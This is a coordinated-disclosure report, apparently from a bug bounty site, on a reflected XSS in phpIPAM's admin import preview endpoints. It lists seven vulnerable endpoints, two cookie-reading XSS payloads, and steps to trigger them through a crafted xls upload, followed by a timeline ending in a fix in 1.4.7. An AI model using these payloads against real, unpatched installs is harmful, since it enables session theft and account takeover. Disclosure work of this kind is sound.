Cross-site Scripting (XSS) - Reflected in phpipam/phpipam

Valid

Reported on

Feb 4th 2022

Description

Cross-Site Scripting vulnerability which allows attackers to execute arbitrary javascript code in the browser of a victim which affected import Data set feature via a spreadSheet file upload.

Proof of Concept

Endpoint

1 POST http://{HOST}/app/admin/import-export/import-vlan-preview.php

2 POST http://{HOST}/app/admin/import-export/import-subnets-preview.php

3 POST http://{HOST}/app/admin/import-export/import-vrf-preview.php

4 POST http://{HOST}/app/admin/import-export/import-ipaddr-preview.php

5 POST http://{HOST}/app/admin/import-export/import-devtype-preview.php

6 POST http://{HOST}/app/admin/import-export/import-devices-preview.php

7 POST http://{HOST}/app/admin/import-export/import-l2dom-preview.php

~

Affected parameter:

Noted** Basically all parameter in each endpoints

reqfields, filetype, importFields__name, importFields__number, importFields__description, importFields__domain etc

~

Payload:

/**/<script>alert(document.cookie)</script>

'><details/open/ontoggle=confirm(document.cookie)>

~

Steps to reproduce:

1 Login as admin.

2 Click Administration > Import/Export

3 Select data set appropriately

4 Click Import button and upload xls file containing XSS payloads with the correct template.

5 Click Preview button and XSS will triggered.

~

~

List of xls file contain XSS payload:

Impact

This vulnerability is capable of deface websites, run malicious javascript code on web pages, stealing a user's cookie and gain unauthorized access to that user's account through the stolen cookie.

We are processing your report and will contact the phpipam team within 24 hours. a year ago
Faisal Fs ⚔️ modified the report
a year ago
Faisal Fs ⚔️ modified the report
a year ago
Faisal Fs ⚔️ modified the report
a year ago
Faisal Fs ⚔️ modified the report
a year ago
Faisal Fs ⚔️ modified the report
a year ago
Faisal Fs ⚔️ modified the report
a year ago
We have contacted a member of the phpipam team and are waiting to hear back a year ago
We have sent a follow up to the phpipam team. We will try again in 7 days. a year ago
We have sent a second follow up to the phpipam team. We will try again in 10 days. a year ago
We have sent a third and final follow up to the phpipam team. This report is now considered stale. a year ago
phpipam/phpipam maintainer has acknowledged this report a year ago
garyallan validated this vulnerability a year ago
Faisal Fs ⚔️ has been awarded the disclosure bounty
The fix bounty is now up for grabs
We have sent a fix follow up to the phpipam team. We will try again in 7 days. a year ago
We have sent a second fix follow up to the phpipam team. We will try again in 10 days. a year ago
We have sent a third and final fix follow up to the phpipam team. This report is now considered stale. a year ago
garyallan marked this as fixed in 1.4.7 with commit 50e36b a year ago
garyallan has been awarded the fix bounty
This vulnerability will not receive a CVE
to join this conversation